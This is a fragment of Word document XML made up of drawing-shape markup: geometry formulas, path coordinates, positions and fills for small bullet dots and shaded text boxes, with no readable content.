                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 4767 4745"/>
                            <a:gd name="T19" fmla="*/ 4767 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 4745 4745"/>
                            <a:gd name="T23" fmla="*/ 4745 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 4745 4745"/>
                            <a:gd name="T27" fmla="*/ 4745 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 4770 4745"/>
                            <a:gd name="T31" fmla="*/ 4770 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 4773 4745"/>
                            <a:gd name="T35" fmla="*/ 4773 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 4794 4745"/>
                            <a:gd name="T39" fmla="*/ 4794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2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77E83" id="Freeform 420" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:237.25pt;width:2.45pt;height:2.45pt;z-index:-1554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" path="m28,49r-7,l18,48,,28,,22,21,r7,l49,25r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,3044190;13335,3044190;11430,3043555;0,3030855;0,3027045;13335,3013075;17780,3013075;31115,3028950;31115,3030855;17780,304419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6755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2967355</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="363220" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="416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16205"/>
                          <a:chOff x="1930" y="4673"/>
                          <a:chExt cx="572" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="417" name="Freeform 419"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="4672"/>
                            <a:ext cx="572" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2480 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 572"/>
                              <a:gd name="T2" fmla="+- 0 4855 4673"/>
                              <a:gd name="T3" fmla="*/ 4855 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 572"/>
                              <a:gd name="T6" fmla="+- 0 4855 4673"/>
                              <a:gd name="T7" fmla="*/ 4855 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 572"/>
                              <a:gd name="T10" fmla="+- 0 4854 4673"/>
                              <a:gd name="T11" fmla="*/ 4854 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 572"/>
                              <a:gd name="T14" fmla="+- 0 4834 4673"/>
                              <a:gd name="T15" fmla="*/ 4834 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 572"/>
                              <a:gd name="T18" fmla="+- 0 4831 4673"/>
                              <a:gd name="T19" fmla="*/ 4831 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 572"/>
                              <a:gd name="T22" fmla="+- 0 4694 4673"/>
                              <a:gd name="T23" fmla="*/ 4694 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 572"/>
                              <a:gd name="T26" fmla="+- 0 4673 4673"/>
                              <a:gd name="T27" fmla="*/ 4673 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2480 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 572"/>
                              <a:gd name="T30" fmla="+- 0 4673 4673"/>
                              <a:gd name="T31" fmla="*/ 4673 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2501 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 572"/>
                              <a:gd name="T34" fmla="+- 0 4694 4673"/>
                              <a:gd name="T35" fmla="*/ 4694 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2501 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 572"/>
                              <a:gd name="T38" fmla="+- 0 4834 4673"/>
                              <a:gd name="T39" fmla="*/ 4834 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2483 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 572"/>
                              <a:gd name="T42" fmla="+- 0 4854 4673"/>
                              <a:gd name="T43" fmla="*/ 4854 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2480 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 572"/>
                              <a:gd name="T46" fmla="+- 0 4855 4673"/>
                              <a:gd name="T47" fmla="*/ 485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2" h="183">
                                <a:moveTo>
                                  <a:pt x="55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50" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="571" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="571" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="553" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="55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4672"/>
                            <a:ext cx="57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&amp;#060;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7" o:spid="_x0000_s1992" style="position:absolute;margin-left:96.5pt;margin-top:233.65pt;width:28.6pt;height:9.15pt;z-index:-15548928;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,4673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">
                <v:shape id="Freeform 419" o:spid="_x0000_s1993" style="position:absolute;left:1930;top:4672;width:572;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="57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MU38cA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBTE74V+h+UVvNWNVapGVymlar3VPxR6e2Zf&#10;k5Ds23R3G+O37woFj8PM/IaZLztTi5acLy0rGPQTEMSZ1SXnCo6H1eMEhA/IGmvLpOBCHpaL+7s5&#10;ptqeeUftPuQiQtinqKAIoUml9FlBBn3fNsTR+7bOYIjS5VI7PEe4qeVTkjxLgyXHhQIbei0oq/a/&#10;RkG1HrY/44+v5jT93LiRzqutWb0p1XvoXmYgAnXhFv5vv2sFo8EYrmfi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DFN/HAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m550,182r-529,l18,181,,161r,-3l,21,21,,550,r21,21l571,161r-18,20l550,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="550,4855;21,4855;18,4854;0,4834;0,4831;0,4694;21,4673;550,4673;571,4694;571,4834;553,4854;550,4855" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 418" o:spid="_x0000_s1994" type="#_x0000_t202" style="position:absolute;left:1930;top:4672;width:5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9osMMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+D/wfwhN2m2nHkK0aS5ENBgOxdgePz+bZ&#10;BpuXrslq99+bg7Djx/d7nU+2EyMN3jhWkC4SEMS104YbBd/Vx9MrCB+QNXaOScEfecg3s4c1Ztpd&#10;uaTxEBoRQ9hnqKANoc+k9HVLFv3C9cSRO7vBYohwaKQe8BrDbSefk2QpLRqODS32tG2pvhx+rYLi&#10;yOW7+dmd9uW5NFX1lvDX8qLU43wqViACTeFffHd/agUvaVwb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9osM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&amp;#060;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6806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3237230</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="415" name="Freeform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5146 5098"/>
                            <a:gd name="T3" fmla="*/ 5146 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 5146 5098"/>
                            <a:gd name="T7" fmla="*/ 5146 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 5146 5098"/>
                            <a:gd name="T11" fmla="*/ 5146 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 5125 5098"/>
                            <a:gd name="T15" fmla="*/ 5125 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 5119 5098"/>
                            <a:gd name="T19" fmla="*/ 5119 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 5098 5098"/>
                            <a:gd name="T23" fmla="*/ 5098 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 5098 5098"/>
                            <a:gd name="T27" fmla="*/ 5098 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 5122 5098"/>
                            <a:gd name="T31" fmla="*/ 5122 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 5125 5098"/>
                            <a:gd name="T35" fmla="*/ 5125 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 5146 5098"/>
                            <a:gd name="T39" fmla="*/ 514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B6A5F3" id="Freeform 416" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:254.9pt;width:2.45pt;height:2.45pt;z-index:-1554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" path="m28,48r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,3267710;13335,3267710;11430,3267710;0,3254375;0,3250565;13335,3237230;17780,3237230;31115,3252470;31115,3254375;17780,326771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6857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3190875</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="417195" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="412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1930" y="5025"/>
                          <a:chExt cx="657" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="413" name="Freeform 415"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="5024"/>
                            <a:ext cx="657" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2565 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 657"/>
                              <a:gd name="T2" fmla="+- 0 5207 5025"/>
                              <a:gd name="T3" fmla="*/ 5207 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 657"/>
                              <a:gd name="T6" fmla="+- 0 5207 5025"/>
                              <a:gd name="T7" fmla="*/ 5207 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 657"/>
                              <a:gd name="T10" fmla="+- 0 5207 5025"/>
                              <a:gd name="T11" fmla="*/ 5207 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 657"/>
                              <a:gd name="T14" fmla="+- 0 5186 5025"/>
                              <a:gd name="T15" fmla="*/ 5186 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 657"/>
                              <a:gd name="T18" fmla="+- 0 5183 5025"/>
                              <a:gd name="T19" fmla="*/ 5183 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 657"/>
                              <a:gd name="T22" fmla="+- 0 5046 5025"/>
                              <a:gd name="T23" fmla="*/ 5046 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 657"/>
                              <a:gd name="T26" fmla="+- 0 5025 5025"/>
                              <a:gd name="T27" fmla="*/ 5025 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2565 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 657"/>
                              <a:gd name="T30" fmla="+- 0 5025 5025"/>
                              <a:gd name="T31" fmla="*/ 5025 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2586 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 657"/>
                              <a:gd name="T34" fmla="+- 0 5046 5025"/>
                              <a:gd name="T35" fmla="*/ 5046 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2586 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 657"/>
                              <a:gd name="T38" fmla="+- 0 5186 5025"/>
                              <a:gd name="T39" fmla="*/ 5186 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2568 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 657"/>
                              <a:gd name="T42" fmla="+- 0 5207 5025"/>
                              <a:gd name="T43" fmla="*/ 5207 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2565 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 657"/>
                              <a:gd name="T46" fmla="+- 0 5207 5025"/>
                              <a:gd name="T47" fmla="*/ 520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35" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="656" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="656" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="638" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="63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024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&amp;#0060;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3" o:spid="_x0000_s1995" style="position:absolute;margin-left:96.5pt;margin-top:251.25pt;width:32.85pt;height:9.15pt;z-index:-15547904;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,5025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">
                <v:shape id="Freeform 415" o:spid="_x0000_s1996" style="position:absolute;left:1930;top:5024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Ytj8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IK3nTXVKym2UgpFFrUQ9MKPT6y&#10;r0lo9m3Irhr/vSsIHoeZ+YbJ1oNtxZF63zjWMJsqEMSlMw1XGn6+3ydLED4gG2wdk4YzeVjnD6MM&#10;U+NO/EXHIlQiQtinqKEOoUul9GVNFv3UdcTR+3O9xRBlX0nT4ynCbSsTpRbSYsNxocaO3moq/4uD&#10;1RCK5V4lvrQVqq3f7JLN5+/qWevx4/D6AiLQEO7hW/vDaJjPnuB6Jh4Bm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Fi2PxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m635,182r-614,l18,182,,161r,-3l,21,21,,635,r21,21l656,161r-18,21l635,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="635,5207;21,5207;18,5207;0,5186;0,5183;0,5046;21,5025;635,5025;656,5046;656,5186;638,5207;635,5207" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 414" o:spid="_x0000_s1997" type="#_x0000_t202" style="position:absolute;left:1930;top:5024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JitcQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IEb3VjEWmjq4hUEIRijAePz+wz&#10;Wcy+jdlV47/vCoUeh5n5hpktOluLO7XeOFYwGiYgiAunDZcKDvn6/ROED8gaa8ek4EkeFvPe2wxT&#10;7R6c0X0fShEh7FNUUIXQpFL6oiKLfuga4uidXWsxRNmWUrf4iHBby48kmUiLhuNChQ2tKiou+5tV&#10;sDxy9m2uP6ddds5Mnn8lvJ1clBr0u+UURKAu/If/2hutYDwaw+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SYrX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&amp;#0060;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6908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3460750</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="411" name="Freeform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5499 5450"/>
                            <a:gd name="T3" fmla="*/ 5499 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 5499 5450"/>
                            <a:gd name="T7" fmla="*/ 5499 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 5498 5450"/>
                            <a:gd name="T11" fmla="*/ 5498 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 5478 5450"/>
                            <a:gd name="T15" fmla="*/ 5478 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 5471 5450"/>
                            <a:gd name="T19" fmla="*/ 5471 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 5450 5450"/>
                            <a:gd name="T23" fmla="*/ 5450 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 5450 5450"/>
                            <a:gd name="T27" fmla="*/ 5450 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 5474 5450"/>
                            <a:gd name="T31" fmla="*/ 5474 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 5478 5450"/>
                            <a:gd name="T35" fmla="*/ 5478 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 5499 5450"/>
                            <a:gd name="T39" fmla="*/ 549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ED4F2" id="Freeform 412" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:272.5pt;width:2.45pt;height:2.45pt;z-index:-1554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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,3491865;13335,3491865;11430,3491230;0,3478530;0,3474085;13335,3460750;17780,3460750;31115,3475990;31115,3478530;17780,349186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6960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3414395</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="471170" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="408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5377"/>
                          <a:chExt cx="742" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="409" name="Freeform 411"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="5377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5560 5377"/>
                              <a:gd name="T3" fmla="*/ 5560 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 742"/>
                              <a:gd name="T6" fmla="+- 0 5560 5377"/>
                              <a:gd name="T7" fmla="*/ 5560 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 742"/>
                              <a:gd name="T10" fmla="+- 0 5559 5377"/>
                              <a:gd name="T11" fmla="*/ 5559 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 742"/>
                              <a:gd name="T14" fmla="+- 0 5538 5377"/>
                              <a:gd name="T15" fmla="*/ 5538 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 742"/>
                              <a:gd name="T18" fmla="+- 0 5535 5377"/>
                              <a:gd name="T19" fmla="*/ 5535 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 742"/>
                              <a:gd name="T22" fmla="+- 0 5398 5377"/>
                              <a:gd name="T23" fmla="*/ 5398 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 742"/>
                              <a:gd name="T26" fmla="+- 0 5377 5377"/>
                              <a:gd name="T27" fmla="*/ 5377 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2650 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 742"/>
                              <a:gd name="T30" fmla="+- 0 5377 5377"/>
                              <a:gd name="T31" fmla="*/ 5377 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2671 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 742"/>
                              <a:gd name="T34" fmla="+- 0 5398 5377"/>
                              <a:gd name="T35" fmla="*/ 5398 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2671 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 742"/>
                              <a:gd name="T38" fmla="+- 0 5538 5377"/>
                              <a:gd name="T39" fmla="*/ 5538 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2653 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 742"/>
                              <a:gd name="T42" fmla="+- 0 5559 5377"/>
                              <a:gd name="T43" fmla="*/ 5559 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2650 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 742"/>
                              <a:gd name="T46" fmla="+- 0 5560 5377"/>
                              <a:gd name="T47" fmla="*/ 556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Text Box 41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377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&amp;#00060;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9" o:spid="_x0000_s1998" style="position:absolute;margin-left:96.5pt;margin-top:268.85pt;width:37.1pt;height:9.15pt;z-index:-15546880;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,5377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">
                <v:shape id="Freeform 411" o:spid="_x0000_s1999" style="position:absolute;left:1930;top:5377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RkO8MA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP3YrCMBSE7xd8h3CEvVk0UUS0GkWExR+EZasPcGiO&#10;bbE5KU22dt/eCIKXw8x8wyzXna1ES40vHWsYDRUI4syZknMNl/P3YAbCB2SDlWPS8E8e1qvexxIT&#10;4+78S20achEh7BPUUIRQJ1L6rCCLfuhq4uhdXWMxRNnk0jR4j3BbybFSU2mx5LhQYE3bgrJb+mc1&#10;7A6nyncX3NszzkfHn5s6tV9K689+t1mACNSFd/jV3hsNEzWH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RkO8MAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m720,183r-699,l18,182,,161r,-3l,21,21,,720,r21,21l741,161r-18,21l720,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="720,5560;21,5560;18,5559;0,5538;0,5535;0,5398;21,5377;720,5377;741,5398;741,5538;723,5559;720,5560" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 410" o:spid="_x0000_s2000" type="#_x0000_t202" style="position:absolute;left:1930;top:5377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ktsMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+D/wfwhN2m2nHkK0aS5ENBgOxdgePz+bZ&#10;BpuXrslq99+bg7Djx/d7nU+2EyMN3jhWkC4SEMS104YbBd/Vx9MrCB+QNXaOScEfecg3s4c1Ztpd&#10;uaTxEBoRQ9hnqKANoc+k9HVLFv3C9cSRO7vBYohwaKQe8BrDbSefk2QpLRqODS32tG2pvhx+rYLi&#10;yOW7+dmd9uW5NFX1lvDX8qLU43wqViACTeFffHd/agUvaZwf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lkts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&amp;#00060;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7011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3676650</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="407" name="Freeform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5839 5790"/>
                            <a:gd name="T3" fmla="*/ 5839 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 5839 5790"/>
                            <a:gd name="T7" fmla="*/ 5839 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 5838 5790"/>
                            <a:gd name="T11" fmla="*/ 5838 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 5818 5790"/>
                            <a:gd name="T15" fmla="*/ 5818 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 5811 5790"/>
                            <a:gd name="T19" fmla="*/ 5811 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 5790 5790"/>
                            <a:gd name="T23" fmla="*/ 5790 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 5790 5790"/>
                            <a:gd name="T27" fmla="*/ 5790 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 5815 5790"/>
                            <a:gd name="T31" fmla="*/ 5815 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 5818 5790"/>
                            <a:gd name="T35" fmla="*/ 5818 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 5839 5790"/>
                            <a:gd name="T39" fmla="*/ 583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15AA2" id="Freeform 408" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:289.5pt;width:2.45pt;height:2.45pt;z-index:-15546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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,25r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,3707765;13335,3707765;11430,3707130;0,3694430;0,3689985;13335,3676650;17780,3676650;31115,3692525;31115,3694430;17780,370776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7062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3630295</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="525145" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="404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5717"/>
                          <a:chExt cx="827" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="405" name="Freeform 407"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="5717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5900 5717"/>
                              <a:gd name="T3" fmla="*/ 5900 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 827"/>
                              <a:gd name="T6" fmla="+- 0 5900 5717"/>
                              <a:gd name="T7" fmla="*/ 5900 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 827"/>
                              <a:gd name="T10" fmla="+- 0 5899 5717"/>
                              <a:gd name="T11" fmla="*/ 5899 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 827"/>
